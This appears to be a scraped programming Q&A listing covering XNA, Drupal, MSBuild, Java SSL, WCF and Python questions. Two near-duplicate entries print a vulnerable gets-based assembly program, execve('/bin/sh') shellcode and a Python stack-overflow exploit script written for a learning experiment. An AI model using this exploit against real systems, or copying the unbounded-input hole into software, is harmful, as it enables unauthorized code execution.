ContentProcessor<MapContent, DemoMapContent> { public override DemoMapContent Process(MapContent input, ContentProcessorContext context) { // build the textures TiledHelpers.BuildTileSetTextures(input, context); // generate source rectangles TiledHelpers.GenerateTileSourceRectangles(input); // now build our output, first by just copying over some data DemoMapContent output = new DemoMapContent { TileWidth = input.TileWidth, TileHeight = input.TileHeight }; // iterate all the layers of the input foreach (LayerContent layer in input.Layers) { // we only care about tile layers in our demo TileLayerContent tlc = layer as TileLayerContent; if (tlc != null) { // create the new layer DemoMapLayerContent outLayer = new DemoMapLayerContent { Width = tlc.Width, Height = tlc.Height, }; // we need to build up our tile list now outLayer.Tiles = new DemoMapTileContent[tlc.Data.Length]; for (int i = 0; i < tlc.Data.Length; i++) { // get the ID of the tile uint tileID = tlc.Data[i]; // use that to get the actual index as well as the SpriteEffects int tileIndex; SpriteEffects spriteEffects; TiledHelpers.DecodeTileID(tileID, out tileIndex, out spriteEffects); // figure out which tile set has this tile index in it and grab // the texture reference and source rectangle. ExternalReference<Texture2DContent> textureContent = null; Rectangle sourceRect = new Rectangle(); // iterate all the tile sets foreach (var tileSet in input.TileSets) { // if our tile index is in this set if (tileIndex - tileSet.FirstId < tileSet.Tiles.Count) { // store the texture content and source rectangle textureContent = tileSet.Texture; sourceRect = tileSet.Tiles[(int)(tileIndex - tileSet.FirstId)].Source; // and break out of the foreach loop break; } } // now insert the tile into our output outLayer.Tiles[i] = new DemoMapTileContent { Texture = textureContent, SourceRectangle = sourceRect, SpriteEffects = spriteEffects }; } // add the layer to our output output.Layers.Add(outLayer); } } // return the output object. because we have ContentSerializerRuntimeType attributes on our // objects, we don't need a ContentTypeWriter and can just use the automatic serialization. return output; } } } TiledLib contains a large amount of files including MapContent.cs using System; using System.Collections.Generic; using System.Globalization; using System.Xml; using Microsoft.Xna.Framework.Content.Pipeline; namespace TiledLib { public enum Orientation : byte { Orthogonal, Isometric, } public class MapContent { public string Filename; public string Directory; public string Version = string.Empty; public Orientation Orientation; public int Width; public int Height; public int TileWidth; public int TileHeight; public PropertyCollection Properties = new PropertyCollection(); public List<TileSetContent> TileSets = new List<TileSetContent>(); public List<LayerContent> Layers = new List<LayerContent>(); public MapContent(XmlDocument document, ContentImporterContext context) { XmlNode mapNode = document["map"]; Version = mapNode.Attributes["version"].Value; Orientation = (Orientation)Enum.Parse(typeof(Orientation), mapNode.Attributes["orientation"].Value, true); Width = int.Parse(mapNode.Attributes["width"].Value, CultureInfo.InvariantCulture); Height = int.Parse(mapNode.Attributes["height"].Value, CultureInfo.InvariantCulture); TileWidth = int.Parse(mapNode.Attributes["tilewidth"].Value, CultureInfo.InvariantCulture); TileHeight = int.Parse(mapNode.Attributes["tileheight"].Value, CultureInfo.InvariantCulture); XmlNode propertiesNode = document.SelectSingleNode("map/properties"); if (propertiesNode != null) { Properties = new PropertyCollection(propertiesNode, context); } foreach (XmlNode tileSet in document.SelectNodes("map/tileset")) { if (tileSet.Attributes["source"] != null) { TileSets.Add(new ExternalTileSetContent(tileSet, context)); } else { TileSets.Add(new TileSetContent(tileSet, context)); } } foreach (XmlNode layerNode in document.SelectNodes("map/layer|map/objectgroup")) { LayerContent layerContent; if (layerNode.Name == "layer") { layerContent = new TileLayerContent(layerNode, context); } else if (layerNode.Name == "objectgroup") { layerContent = new MapObjectLayerContent(layerNode, context); } else { throw new Exception("Unknown layer name: " + layerNode.Name); } // Layer names need to be unique for our lookup system, but Tiled // doesn't require unique names. string layerName = layerContent.Name; int duplicateCount = 2; // if a layer already has the same name... if (Layers.Find(l => l.Name == layerName) != null) { // figure out a layer name that does work do { layerName = string.Format("{0}{1}", layerContent.Name, duplicateCount); duplicateCount++; } while (Layers.Find(l => l.Name == layerName) != null); // log a warning for the user to see context.Logger.LogWarning(string.Empty, new ContentIdentity(), "Renaming layer \"{1}\" to \"{2}\" to make a unique name.", layerContent.Type, layerContent.Name, layerName); // save that name layerContent.Name = layerName; } Layers.Add(layerContent); } } } } I'm lost as to why this is failing. Thoughts? -- EDIT -- After playing with it a bit, I would think it has something to do with referencing the projects. I'm already referencing the TiledLib within my main windows project (TiledTest). However, this doesn't seem to make a difference. I can place the dll generated from the TiledLib project into the debug folder of TiledTest, and this causes it to generate a different error: Error loading "desert". Cannot find ContentTypeReader for Microsoft.Xna.Framework.Content.Pipeline.ExternalReference`1[Microsoft.Xna.Framework.Content.Pipeline.Graphics.Texture2DContent]. at Microsoft.Xna.Framework.Content.ContentTypeReaderManager.GetTypeReader(Type targetType, ContentReader contentReader) at Microsoft.Xna.Framework.Content.ContentTypeReaderManager.GetTypeReader(Type targetType) at Microsoft.Xna.Framework.Content.ReflectiveReaderMemberHelper..ctor(ContentTypeReaderManager manager, FieldInfo fieldInfo, PropertyInfo propertyInfo, Type memberType, Boolean canWrite) at Microsoft.Xna.Framework.Content.ReflectiveReaderMemberHelper.TryCreate(ContentTypeReaderManager manager, Type declaringType, FieldInfo fieldInfo) at Microsoft.Xna.Framework.Content.ReflectiveReader1.Initialize(ContentTypeReaderManager manager) at Microsoft.Xna.Framework.Content.ContentTypeReaderManager.ReadTypeManifest(Int32 typeCount, ContentReader contentReader) at Microsoft.Xna.Framework.Content.ContentReader.ReadHeader() at Microsoft.Xna.Framework.Content.ContentReader.ReadAsset[T]() at Microsoft.Xna.Framework.Content.ContentManager.ReadAsset[T](String assetName, Action1 recordDisposableObject) at Microsoft.Xna.Framework.Content.ContentManager.Load[T](String assetName) at TiledTest.Game1.LoadContent() in C:\My Documents\Dropbox\Visual Studio Projects\TiledTest\TiledTest\TiledTest\Game1.cs:line 51 at Microsoft.Xna.Framework.Game.Initialize() at TiledTest.Game1.Initialize() in C:\My Documents\Dropbox\Visual Studio Projects\TiledTest\TiledTest\TiledTest\Game1.cs:line 39 at Microsoft.Xna.Framework.Game.RunGame(Boolean useBlockingRun) at Microsoft.Xna.Framework.Game.Run() at TiledTest.Program.Main(String[] args) in C:\My Documents\Dropbox\Visual Studio Projects\TiledTest\TiledTest\TiledTest\Program.cs:line 15 This is all incredibly frustrating as the demo doesn't appear to have any special linking properties. The TiledLib I am utilizing is from Nick Gravelyn, and can be found here: https://bitbucket.org/nickgravelyn/tiledlib. The demo it comes with works fine, and yet in recreating I always run into this error.

    Read the article

  • String search and write into file in jython

    - by kdev
    hi Everyone , i wish to write a program that can read a file and if a particular str_to_find is found in a bigger string say AACATGCCACCTGAATTGGATGGAATTCATGCGGGACACGCGGATTACACCTATGAGCAGAAATACGGCCTGCGCGATTACCGTGGCGGTGGACGTTCTTCCGCGCGTGAAACCGCGATGCGCGTAGCGGCAGGGGCGATCGCCAAGAAATACCTGGCGGAAAAGTTCGGCATCGAAATCCGCGGCTGCCTGACCCAGATGGGCGACATTCCGCTGGAGATTAAAGACTGGCGTCAGGTTGAGCTTAATCCGTTTTC then write that line and the above line of it into the file and keep repeating it for all the match found. Please suggest i have written the program for printing that particular search line but i dont know how to write the above line. Thanks everyone for your help. import re import string file=open('C:/Users/Administrator/Desktop/input.txt','r') output=open('C:/Users/Administrator/Desktop/output.txt','w') count_record=file.readline() str_to_find='AACCATGC' while count_record: if string.find(list,str_to_find) ==0: output.write(count_record) file.close() output.close()

    Read the article

  • PHP throws 'Allowed memory exhausted' errors while migrating data in Drupal.

    - by Stan
    I'm trying to setup a tiny sandbox on a local machine to play around with Drupal. I created a few CCK types; in order to create a few nodes I wrote the following script: chdir('C:\..\drupal'); require_once '.\includes\bootstrap.inc'; drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL); module_load_include('inc', 'node', 'node.pages'); $node = array('type' => 'my_type'); $link = mysql_connect(..); mysql_select_db('my_db'); $query_bldg = ' SELECT stuff FROM table LIMIT 10 '; $result = mysql_query($query_bldg); while ($row = mysql_fetch_object($result)) { $form_state = array(); $form_state['values']['name'] = 'admin'; $form_state['values']['status'] = 1; $form_state['values']['op'] = t('Save'); $form_state['values']['title'] = $row->val_a; $form_state['values']['my_field'][0]['value'] = $row->val_b; ## About another dozen or so of similar assignments... drupal_execute('node_form', $form_state, (object)$node); } Here are a few relevant lines from php_errors.log: [12-Jun-2010 05:02:47] PHP Notice: Undefined index: REMOTE_ADDR in C:\..\drupal\includes\bootstrap.inc on line 1299 [12-Jun-2010 05:02:47] PHP Notice: Undefined index: REMOTE_ADDR in C:\..\drupal\includes\bootstrap.inc on line 1299 [12-Jun-2010 05:02:47] PHP Warning: session_start(): Cannot send session cookie - headers already sent by (output started at C:\..\drupal\includes\bootstrap.inc:1299) in C:\..\drupal\includes\bootstrap.inc on line 1143 [12-Jun-2010 05:02:47] PHP Warning: session_start(): Cannot send session cache limiter - headers already sent (output started at C:\..\drupal\includes\bootstrap.inc:1299) in C:\..\drupal\includes\bootstrap.inc on line 1143 [12-Jun-2010 05:02:47] PHP Warning: Cannot modify header information - headers already sent by (output started at C:\..\drupal\includes\bootstrap.inc:1299) in C:\..\drupal\includes\bootstrap.inc on line 709 [12-Jun-2010 05:02:47] PHP Warning: Cannot modify header information - headers already sent by (output started at C:\..\drupal\includes\bootstrap.inc:1299) in C:\..\drupal\includes\bootstrap.inc on line 710 [12-Jun-2010 05:02:47] PHP Warning: Cannot modify header information - headers already sent by (output started at C:\..\drupal\includes\bootstrap.inc:1299) in C:\..\drupal\includes\bootstrap.inc on line 711 [12-Jun-2010 05:02:47] PHP Warning: Cannot modify header information - headers already sent by (output started at C:\..\drupal\includes\bootstrap.inc:1299) in C:\..\drupal\includes\bootstrap.inc on line 712 [12-Jun-2010 05:02:47] PHP Notice: Undefined index: REMOTE_ADDR in C:\..\drupal\includes\bootstrap.inc on line 1299 [12-Jun-2010 05:02:48] PHP Fatal error: Allowed memory size of 239075328 bytes exhau sted (tried to allocate 261904 bytes) in C:\..\drupal\includes\form.inc on line 488 [12-Jun-2010 05:03:22] PHP Fatal error: Allowed memory size of 239075328 bytes exhausted (tried to allocate 261904 bytes) in C:\..\drupal\includes\form.inc on line 488 [12-Jun-2010 05:04:34] PHP Fatal error: Allowed memory size of 262144 bytes exhausted (tried to allocate 261904 bytes) in Unknown on line 0 At this point any action php takes results in the last error shown above. I tried increasing the value of memory_limit in php.ini before the final Fatal error which obviously didn't help. How can the error be eliminated? Am I on a correct path to migrating data into Drupal or should the cck tables be operated on directly? Windows XP PHP 5.3.2 VC6 Apache 2.2

    Read the article

  • _CopyWebApplication with web.config transformations

    - by Jeremy
    I am trying to have my web application automatically Publish when a Release build is performed. I'm doing this using the _CopyWebApplication target. I added the following to my .csproj file: <!-- Automatically Publish in Release build. --> <Import Project="$(MSBuildExtensionsPath)\Microsoft\VisualStudio\v10.0\WebApplications\Microsoft.WebApplication.targets" /> <Target Name="AfterBuild"> <RemoveDir Directories="$(ProjectDir)..\Output\MyWeb" ContinueOnError="true" /> <MSBuild Projects="MyWeb.csproj" Properties="Configuration=Release;WebProjectOutputDir=$(ProjectDir)..\Output\MyWeb;OutDir=$(ProjectDir)bin\" Targets="ResolveReferences;_CopyWebApplication" /> </Target> This works but with one issue. The difference between this output, and the output generated when using the Publish menu item in Visual Studio, is that the Web.Release.config transformation is not applied to the Web.config file when using the MSBuild method. Instead, Web.config, Web.Release.config, and Web.Debug.config are all copied. Any ideas are appreciated.

    Read the article

  • Java, server client TCP communication ends with RST

    - by Senne
    I'm trying to figure out if this is normal. Because without errors, a connection should be terminated by: FIN -> <- ACK <- FIN ACK -> I get this at the end of a TCP connection (over SSL, but i also get it with non-encrypted): From To 1494 server client TCP search-agent > 59185 [PSH, ACK] Seq=25974 Ack=49460 Win=63784 Len=50 1495 client server TCP 59185 > search-agent [ACK] Seq=49460 Ack=26024 Win=63565 Len=0 1496 client server TCP 59185 > search-agent [PSH, ACK] Seq=49460 Ack=26024 Win=63565 Len=23 1497 client server TCP 59185 > search-agent [FIN, ACK] Seq=49483 Ack=26024 Win=63565 Len=0 1498 server client TCP search-agent > 59185 [PSH, ACK] Seq=26024 Ack=49484 Win=63784 Len=23 1499 client server TCP 59185 > search-agent [RST, ACK] Seq=49484 Ack=26047 Win=0 Len=0 The client exits normally and reaches socket.close, shouldn't then the connection be shut down normally, without a reset? I can't find anything about the TCP streams of java on google... Here is my code: Server: package Security; import java.io.*; import java.net.*; import javax.net.ServerSocketFactory; import javax.net.ssl.*; import java.util.*; public class SSLDemoServer { private static ServerSocket serverSocket; private static final int PORT = 1234; public static void main(String[] args) throws IOException { int received = 0; String returned; ObjectInputStream input = null; PrintWriter output = null; Socket client; System.setProperty("javax.net.ssl.keyStore", "key.keystore"); System.setProperty("javax.net.ssl.keyStorePassword", "vwpolo"); System.setProperty("javax.net.ssl.trustStore", "key.keystore"); System.setProperty("javax.net.ssl.trustStorePassword", "vwpolo"); try { System.out.println("Trying to set up server ..."); ServerSocketFactory factory = SSLServerSocketFactory.getDefault(); serverSocket = factory.createServerSocket(PORT); System.out.println("Server started!\n"); } catch (IOException ioEx) { System.out.println("Unable to set up port!"); ioEx.printStackTrace(); System.exit(1); } while(true) { client = serverSocket.accept(); System.out.println("Client trying to connect..."); try { System.out.println("Trying to create inputstream..."); input = new ObjectInputStream(client.getInputStream()); System.out.println("Trying to create outputstream..."); output = new PrintWriter(client.getOutputStream(), true); System.out.println("Client successfully connected!"); while( true ) { received = input.readInt(); returned = Integer.toHexString(received); System.out.print(" " + received); output.println(returned.toUpperCase()); } } catch(SSLException sslEx) { System.out.println("Connection failed! (non-SSL connection?)\n"); client.close(); continue; } catch(EOFException eofEx) { System.out.println("\nEnd of client data.\n"); } catch(IOException ioEx) { System.out.println("I/O problem! (correct inputstream?)"); } try { input.close(); output.close(); } catch (Exception e) { } client.close(); System.out.println("Client closed.\n"); } } } Client: package Security; import java.io.*; import java.net.*; import javax.net.ssl.*; import java.util.*; public class SSLDemoClient { private static InetAddress host; private static final int PORT = 1234; public static void main(String[] args) { System.setProperty("javax.net.ssl.keyStore", "key.keystore"); System.setProperty("javax.net.ssl.keyStorePassword", "vwpolo"); System.setProperty("javax.net.ssl.trustStore", "key.keystore"); System.setProperty("javax.net.ssl.trustStorePassword", "vwpolo"); System.out.println("\nCreating SSL socket ..."); SSLSocket socket = null; try { host = InetAddress.getByName("192.168.56.101"); SSLSocketFactory factory = (SSLSocketFactory) SSLSocketFactory.getDefault(); socket = (SSLSocket) factory.createSocket(host, PORT); socket.startHandshake(); } catch(UnknownHostException uhEx) { System.out.println("\nHost ID not found!\n"); System.exit(1); } catch(SSLException sslEx) { System.out.println("\nHandshaking unsuccessful ..."); System.exit(1); } catch (IOException e) { e.printStackTrace(); } System.out.println("\nHandshaking succeeded ...\n"); SSLClientThread client = new SSLClientThread(socket); SSLReceiverThread receiver = new SSLReceiverThread(socket); client.start(); receiver.start(); try { client.join(); receiver.join(); System.out.println("Trying to close..."); socket.close(); } catch(InterruptedException iEx) { iEx.printStackTrace(); } catch(IOException ioEx) { ioEx.printStackTrace(); } System.out.println("\nClient finished."); } } class SSLClientThread extends Thread { private SSLSocket socket; public SSLClientThread(SSLSocket s) { socket = s; } public void run() { try { ObjectOutputStream output = new ObjectOutputStream(socket.getOutputStream()); for( int i = 1; i < 1025; i++) { output.writeInt(i); sleep(10); output.flush(); } output.flush(); sleep(1000); output.close(); } catch(IOException ioEx) { System.out.println("Socket closed or unable to open socket."); } catch(InterruptedException iEx) { iEx.printStackTrace(); } } } class SSLReceiverThread extends Thread { private SSLSocket socket; public SSLReceiverThread(SSLSocket s) { socket = s; } public void run() { String response = null; BufferedReader input = null; try { input = new BufferedReader( new InputStreamReader(socket.getInputStream())); try { response = input.readLine(); while(!response.equals(null)) { System.out.print(response + " "); response = input.readLine(); } } catch(Exception e) { System.out.println("\nEnd of server data.\n"); } input.close(); } catch(IOException ioEx) { ioEx.printStackTrace(); } } }

    Read the article

  • Convert text files to excel files using python

    - by Rahim Jaafar
    I am working on INFORMIX 4GL programs. That programs produce output text files.This is an example of the output: Lot No|Purchaser name|Billing|Payment|Deposit|Balance| J1006|JAUHARI BIN HAMIDI|5285.05|4923.25|0.00|361.80| J1007|LEE, CHIA-JUI AKA LEE, ANDREW J. R.|5366.15|5313.70|0.00|52.45| J1008|NAZRIN ANEEZA BINTI NAZARUDDIN|5669.55|5365.30|0.00|304.25| J1009|YAZID LUTFI BIN AHMAD LUTFI|3180.05|3022.30|0.00|157.75| This text files can manually convert to excel files.But, I wanna ask, is there any script that I can use to convert .txt files to .xls files ? Hi all,now I'm already can convert text files to excell file by python using script that was given from user named Rami Helmy.A big thanks for him.But now,That script will produce more than one excell files depends on the number of '|' from the text files.Beside that,That script also can only convert one text files.I a going to convert all text files without state the name of text files.Therefore,I am looking such a way on how to this script going to: output only one excell file convert all .txt files from the directory that was given from user. output excell's file name are automaticly copied from the file name of text files. I am new in python,hopefully someone can help me to solve my problems.Thank You.. done all the task,but there was something that I'm confused.. that output excell files contains an "square" symbol like this: then, how can I ensure that there is no square symbol like that after I convert from text files to excell? thank you...

    Read the article

  • Shellcode for a simple stack overflow: Exploited program with shell terminates directly after execve

    - by henning
    Hi, I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0 and nx bit in the bios). It jumps to the stack and executes the shellcode, but it doesn't start a shell. The execve syscall succeeds but afterwards it just terminates. Any idea what's wrong? Running the shellcode standalone works just fine. Bonus question: Why do I need to set rax to zero before calling printf? (See comment in the code) Vulnerable file buffer.s: .data .fmtsp: .string "Stackpointer %p\n" .fmtjump: .string "Jump to %p\n" .text .global main main: push %rbp mov %rsp, %rbp sub $120, %rsp # calling printf without setting rax # to zero results in a segfault. why? xor %rax, %rax mov %rsp, %rsi mov $.fmtsp, %rdi call printf mov %rsp, %rdi call gets xor %rax, %rax mov $.fmtjump, %rdi mov 8(%rbp), %rsi call printf xor %rax, %rax leave ret shellcode.s .text .global main main: mov $0x68732f6e69622fff, %rbx shr $0x8, %rbx push %rbx mov %rsp, %rdi xor %rsi, %rsi xor %rdx, %rdx xor %rax, %rax add $0x3b, %rax syscall exploit.py shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05" stackpointer = "\x7f\xff\xff\xff\xe3\x28" output = shellcode output += 'a' * (120 - len(shellcode)) # fill buffer output += 'b' * 8 # override stored base pointer output += ''.join(reversed(stackpointer)) print output Compiled with: $ gcc -o buffer buffer.s $ gcc -o shellcode shellcode.s Started with: $ python exploit.py | ./buffer Stackpointer 0x7fffffffe328 Jump to 0x7fffffffe328 Debugging with gdb: $ python exploit.py > exploit.txt (Note: corrected stackpointer address in exploit.py for gdb) $ gdb buffer (gdb) run < exploit.txt Starting program: /home/henning/bo/buffer < exploit.txt Stackpointer 0x7fffffffe308 Jump to 0x7fffffffe308 process 4185 is executing new program: /bin/dash Program exited normally.

    Read the article

  • WCF Method is returning xml fragment but no xml UTF-8 header

    - by horls
    My method does not return the header, just the root element xml. internal Message CreateReturnMessage(string output, string contentType) { // create dictionaryReader for the Message byte[] resultBytes = Encoding.UTF8.GetBytes(output); XmlDictionaryReader xdr = XmlDictionaryReader.CreateTextReader(resultBytes, 0, resultBytes.Length, Encoding.UTF8, XmlDictionaryReaderQuotas.Max, null); if (WebOperationContext.Current != null) WebOperationContext.Current.OutgoingResponse.ContentType = contentType; // create Message return Message.CreateMessage(MessageVersion.None, "", xdr); } However, the output I get is: <Test> <Message>Hello World!</Message> </Test> I would like the output to render as: <?xml version="1.0" encoding="utf-8" standalone="yes"?> <Test> <Message>Hello World!</Message> </Test>

    Read the article

  • Shellcode for a simple stack overflow doesn't start a shell

    - by henning
    Hi, I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0 and nx bit in the bios). It jumps to the stack and executes the shellcode, but it doesn't start a shell. Seems like the execve syscall fails. Any idea what's wrong? Running the shellcode standalone works just fine. Bonus question: Why do I need to set rax to zero before calling printf? (See comment in the code) Vulnerable file buffer.s: .data .fmtsp: .string "Stackpointer %p\n" .fmtjump: .string "Jump to %p\n" .text .global main main: push %rbp mov %rsp, %rbp sub $120, %rsp # calling printf without setting rax # to zero results in a segfault. why? xor %rax, %rax mov %rsp, %rsi mov $.fmtsp, %rdi call printf mov %rsp, %rdi call gets xor %rax, %rax mov $.fmtjump, %rdi mov 8(%rbp), %rsi call printf xor %rax, %rax leave ret shellcode.s .text .global main main: mov $0x68732f6e69622fff, %rbx shr $0x8, %rbx push %rbx mov %rsp, %rdi xor %rsi, %rsi xor %rdx, %rdx xor %rax, %rax add $0x3b, %rax syscall exploit.py shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05" stackpointer = "\x7f\xff\xff\xff\xe3\x28" output = shellcode output += 'a' * (120 - len(shellcode)) # fill buffer output += 'b' * 8 # override stored base pointer output += ''.join(reversed(stackpointer)) print output Compiled with: $ gcc -o buffer buffer.s $ gcc -o shellcode shellcode.s Started with: $ python exploit.py | ./buffer Stackpointer 0x7fffffffe328 Jump to 0x7fffffffe328

    Read the article

  • Dependency Property not getting updated value via ActivityBind

    - by d h
    I have a Sequence Activity which holds two activities (Activity A and B), the input dependency property for Activity B is bound an output dependency property of Activity A. However, when I run the sequence activity, the Input for activity B is never updated and just uses the default value of activity A's output. My question is: is there a way to enforce an update on activity B's input so that it gets the latest value of activity A's output?

    Read the article

  • Can't display multi byte string on MonoDevelop Mac OS X

    - by wataradio
    The problem is following one line code: Console.WriteLine ("?"); This results in the following output in Application Output window: ? How can I display "?" instead of "?" in Application Output window. I made sure following things: The source code encoding is UTF-8 I selected Japanese font set "Osaka Regular-Mono" (Preferences General Font) Executing the exe from a terminal, "?" is displayed correctly on terminal window On Ubuntu's MonoDevelop, "?" is displayed correctly in Application Output window Environments: MonoDevelop 2.2.2 Mono 2.6.4 Mac OS X 10.6.3

    Read the article

  • Overload Anonymous Functions

    - by Nissan Fan
    Still wrapping my head around Delegates and I'm curious: Is it possible to overload anonymous functions? Such that: delegate void Output(string x, int y); Supports: Output show = (x, y) => Console.WriteLine("{0}: {1}", x.ToString(), y.ToString()); And: delegate void Output(string x, string y); Allowing: show( "ABC", "EFG" ); And: show( "ABC", 123 );

    Read the article

  • audio processing in iPhone

    - by Janaka
    I am writing an iPhone application to apply filters to audio input and output the result in real time. I am new to audio processing but using audiounit, the correct approach? I found out how to output data using audiounit but couldn’t figure out how to capture input audio. Is there a sample application showing how to connect input and output using audiounit?

    Read the article

  • i want to find values between { }

    - by girish
    I m working with regular expression( Regex ) but not finding the exact output.. i want to find the values between two curly braces { Value } = value i use the following pattern but not getting the exact output...it does not remove first "{" ... string pattern = "\{*\}"; if my value is - {girish} it returns me {girish instead of this i want girish as output...

    Read the article

  • SimpleDOM sortedXPath date sorting works on localhost but not on remote server.

    - by Imminent
    Here's what i'm trying to do: 1) Take a basic XML page (data.xml) 2) Load it with simpleDOM 3) Use simpleDOM sortedXPath to sort all XML items by their pubDate 4) Display sorted output Here is the code I currently have. My code below outputs exactly what I need when run it on my localhost (XAMPP w/PHP 5.3) but on my remote server (which has at least PHP 5.0+) all is lost and a completely blank page is output. It will output the $xml array with print_r though. Here is my code: <?php include('SimpleDOM.php'); $xml = simpledom_load_file('data.xml'); $dateformat = "D j M, g:ia"; /* print_r($xml); <-array will output on remote server if put here, but alas nothing else beyond this point */ /*Output First 5 items sorted by pubDate*/ foreach($xml->channel->sortedXPath('item','pubDate', SORT_DESC) as $i => $item){ if ($i > 4){ break; } print "<p>This Weeks Deal:<strong> ".$item->title."</strong></p>"; print $item->description; print "<p>Date Posted:<strong> ".date($dateformat, strtotime($item->pubDate))."</strong></p>"; } ?> Like I said, this code seems to work great on my localhost... but not being able to run it on my remote server is making me crazy. Any ideas ?? Any help will be far beyond appreciated.

    Read the article

  • How do I give each test its own TestResults folder?

    - by izb
    I have a set of unit tests, each with a bunch of methods, each of which produces output in the TestResults folder. At the moment, all the test files are jumbled up in this folder, but I'd like to bring some order to the chaos. Ideally, I'd like to have a folder for each test method. I know I can go round adding code to each test to make it produce output in a subfolder instead, but I was wondering if there was a way to control the output folder location with the Visual Studio unit test framework, perhaps using an initialization method on each test class so that any new tests added automatically get their own output folder without needing copy/pasted boilerplate code?

    Read the article

< Previous Page | 131 132 133 134 135 136 137 138 139 140 141 142  | Next Page >